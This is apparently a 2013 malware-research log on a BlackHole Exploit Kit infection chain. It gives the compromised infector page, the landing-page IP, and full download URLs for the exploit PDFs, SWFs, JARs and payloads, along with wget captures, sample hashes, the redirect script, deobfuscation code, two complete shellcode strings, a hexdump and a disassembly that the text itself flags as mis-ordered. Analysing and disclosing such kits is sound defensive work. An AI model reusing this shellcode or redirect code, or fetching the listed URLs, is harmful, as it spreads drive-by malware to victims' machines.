- ===================================================
- #MalwareMustDie!
- BlackHole Exploit Kit with Double infector:
- Cridex & FakeAV/Ransomer (depends on your request IP)
- Infector: h00p://webworks.investorship.co.jp/page-329.htm
- Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
- All of the cracked infector download URLs:
- //JARS
- ..served from the same URL as the landing page (applet tag); the server picks the JAR by the Java User-Agent, see the two fetches below (2 JARs found)
- //PDF:
- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- //SWF
- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
- //Payloads:
- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
- The catches (date, time, MD5, size, filename):
- --------------
- 2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
- 2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
- 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
- 2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
- 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
- 2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
- 2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
- 2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
- 2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
- 2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
- 2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
- 2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
- 2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
- 2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
- 2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
- -----
- Total: 2 distinct SWF (flash1/flash3 and flash2/flash4 share an MD5), 4 PDF, 2 JARs, 2 payloads (about.exe, readme.exe)
- Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
- =================================================================
- // infector:
- h00p://webworks.investorship.co.jp/page-329.htm
- --2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
- Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
- Caching webworks.investorship.co.jp => 117.20.100.110
- Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
- :
- GET /page-329.htm HTTP/1.0
- Host: webworks.investorship.co.jp
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Mon, 18 Feb 2013 05:11:05 GMT
- Server: Apache
- Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
- ETag: "1185062d-1b2-5121b3f6"
- Accept-Ranges: bytes
- Content-Length: 434
- Connection: close
- Content-Type: text/html
- :
- 200 OK
- Length: 434 [text/html]
- Saving to: `page-329.htm'
- 2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
- //-------cat---------------
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Please wait</title>
- </head>
- <body>
- <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
- <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
- <script>
- var1=49;
- var2=var1;
- if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
- </script>
- </body>
- </html>
- // -----------landing page/is a BHEK moronz.----------------------
- --2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php HTTP/1.0
- Referer: h00p://webworks.investorship.co.jp/page-329.htm
- Host: 46.175.224.21:8080
- HTTP request sent, awaiting response...
- :
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:13:34 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:16:04 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `public_version.php'
- 2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
- // -----------------checks the jars..---------------------
- // fetch as an old Java runtime (User-Agent: Java/1.6.0_23) -> java1.jar
- --2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php HTTP/1.0
- User-Agent: Java/1.6.0_23
- Host: 46.175.224.21:8080
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:31:33 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Content-Length: 13873
- ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
- Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Length: 13873 (14K) [application/java-archive]
- Saving to: `java1.jar'
- 2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
- // fetch as a newer Java runtime (User-Agent: Java/1.7.0_09) -> java2.jar, a different file
- --2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php HTTP/1.0
- User-Agent: Java/1.7.0_09
- Host: 46.175.224.21:8080
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:33:15 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Content-Length: 12968
- ETag: "36df7f936b42abe2ccff75544f08f9f2"
- Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Length: 12968 (13K) [application/java-archive]
- Saving to: `./java2.jar'
- 2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
- // -------------------------------------------------------
- // see both PluginDetect branches....
- // each carries a different shellcode, one per payload URL (two payloads)...
- // and each branch serves 2 PDF, 2 SWF, 2 JARs
- // PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
- // and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
- // ==========================================================================
- // ========================================
- // get the deobs + crack both shellcodes:
- // (each shellcode is stored as a string written backwards with "%u" spelled "%!";
- //  split("").reverse().join("") restores the order and the replace() turns "%!"
- //  back into "%u", giving the %u-escaped shellcode shown in the output below)
- // ========================================
- var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var xxx= a["replace"](/\%!/g, "%" + "u");
- document.write(xxx);
- var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var yyy= b["replace"](/\%!/g, "%" + "u");
- document.write("\n\n"+yyy);
- // output:
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
- // ========================
- // shellcode analysis...
- // ========================
- // break the eggs... no text...one time...
- // raws...
- 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e46191512404219191212421a1b19120e4e4d42191512421b1b1b12121a44191912124f41191912124746191912124741195c0e19150e4351475815420e154028410028
- // view...
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
- 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
- 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
- 5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
- 19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
- 5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
- 12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
- 43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.
- //disasm.. (caveat: this listing was run on the un-swapped %u stream from "raws" above, so from
- // offset 4 on it is not the instruction stream that executes; the hexdump has the right byte order.
- // Read from the hexdump, the stub at 0x04 is: 66 83 e4 fc (and sp,-4) / fc (cld) / eb 10 (jmp) /
- // 58 (pop eax) / 31 c9 (xor ecx,ecx) / 66 81 e9 03 fe (sub cx,-0x1fd) / 80 30 28 (xor byte [eax],0x28) /
- // 40 (inc eax) / e2 fa (loop) / eb 05 / e8 eb ff ff ff (call back to the pop): a 509-byte XOR-0x28
- // decoder, and the API trace further down is what the decoded bytes do)
- 00000000 41 inc ecx
- 00000001 41 inc ecx
- 00000002 41 inc ecx
- 00000003 41 inc ecx
- 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
- 00000008 EBFC jmp short 0x6 ; loop
- 0000000A 58 pop eax
- 0000000B 10C9 adc cl,cl
- 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
- 00000013 FE db 0xfe
- 00000014 2830 sub [eax],dh ; math
- 00000016 E240 loop 0x58 ; loop
- 00000018 EBFA jmp short 0x14 ; loop
- 0000001A E805FFEBFF call dword 0xffebff24 ; call
- 0000001F FFCC dec esp
- 00000021 AD lodsd
- 00000022 1C5D sbb al,0x5d
- 00000024 77C1 ja 0xffffffe7
- 00000026 E81BA34C18 call dword 0x184ca346 ; call
- 0000002B 6868A3A324 push dword 0x24a3a368
- 00000030 3458 xor al,0x58 ; decryption
- 00000032 A37E205EF3 mov [0xf35e207e],eax
- 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
- 0000003D 2B041B sub eax,[ebx+ebx] ; math
- 00000040 C6 db 0xc6
- 00000041 A9383DD7D7 test eax,0xd7d73d38
- 00000046 A39018686E mov [0x6e681890],eax
- 0000004B EB2E jmp short 0x7b ; loop
- 0000004D 11D3 adc ebx,edx
- 0000004F 5D pop ebp
- 00000050 1CAF sbb al,0xaf
- 00000052 AD lodsd
- 00000053 0C5D or al,0x5d
- 00000055 CC int3
- 00000056 C17964C3 sar dword [ecx+0x64],0xc3
- 0000005A 7E79 jng 0xd5
- 0000005C 5D pop ebp
- 0000005D A3A3141D5C mov [0x5c1d14a3],eax
- 00000062 2B507E sub edx,[eax+0x7e] ; math
- 00000065 DD5EA3 fstp qword [esi-0x5d]
- 00000068 2B08 sub ecx,[eax] ; math
- 0000006A 1BDD sbb ebx,ebp
- 0000006C 61 popad
- 0000006D E1D4 loope 0x43
- 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
- 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
- 0000007C E3E9 jecxz 0x67
- 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
- 00000084 37 aaa
- 00000085 13CE adc ecx,esi
- 00000087 5D pop ebp
- 00000088 A3760C76F5 mov [0xf5760c76],eax
- 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
- 00000093 A5 movsd
- 00000094 D7 xlatb
- 00000095 C40C7C les ecx,[esp+edi*2]
- 00000098 A3242BF0A3 mov [0xa3f02b24],eax
- 0000009D F5 cmc
- 0000009E A32CED2B76 mov [0x762bed2c],eax
- 000000A3 83EB71 sub ebx,byte +0x71 ; math
- 000000A6 7BC3 jpo 0x6b
- 000000A8 A385084055 mov [0x55400885],eax
- 000000AD A81B test al,0x1b
- 000000AF 242B and al,0x2b
- 000000B1 5C pop esp
- 000000B2 C3 ret
- 000000B3 BEA3DB2040 mov esi,0x4020dba3
- 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
- 000000BE D7 xlatb
- 000000BF B0D7 mov al,0xd7
- 000000C1 D7 xlatb
- 000000C2 D1CA ror edx,1 ; bitwise cipher
- 000000C4 28C0 sub al,al ; math
- 000000C6 2828 sub [eax],ch ; math
- 000000C8 7028 jo 0xf2
- 000000CA 42 inc edx
- 000000CB 7840 js 0x10d
- 000000CD 6828D72828 push dword 0x2828d728
- 000000D2 AB stosd
- 000000D3 7831 js 0x106
- 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
- 000000DA 76A3 jna 0x7f
- 000000DC AB stosd
- 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
- 000000E3 40 inc eax
- 000000E4 284640 sub [esi+0x40],al ; math
- 000000E7 285A5D sub [edx+0x5d],bl ; math
- 000000EA 45 inc ebp
- 000000EB 44 inc esp
- 000000EC D7 xlatb
- 000000ED 7CAB jl 0x9a
- 000000EF 3E20EC ds and ah,ch
- 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
- 000000F9 D7 xlatb
- 000000FA C3 ret
- 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
- 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
- 00000107 240C and al,0xc
- 00000109 2C4D sub al,0x4d ; math
- 0000010B 5A pop edx
- 0000010C 5B pop ebx
- 0000010D 4F dec edi
- 0000010E 6C insb
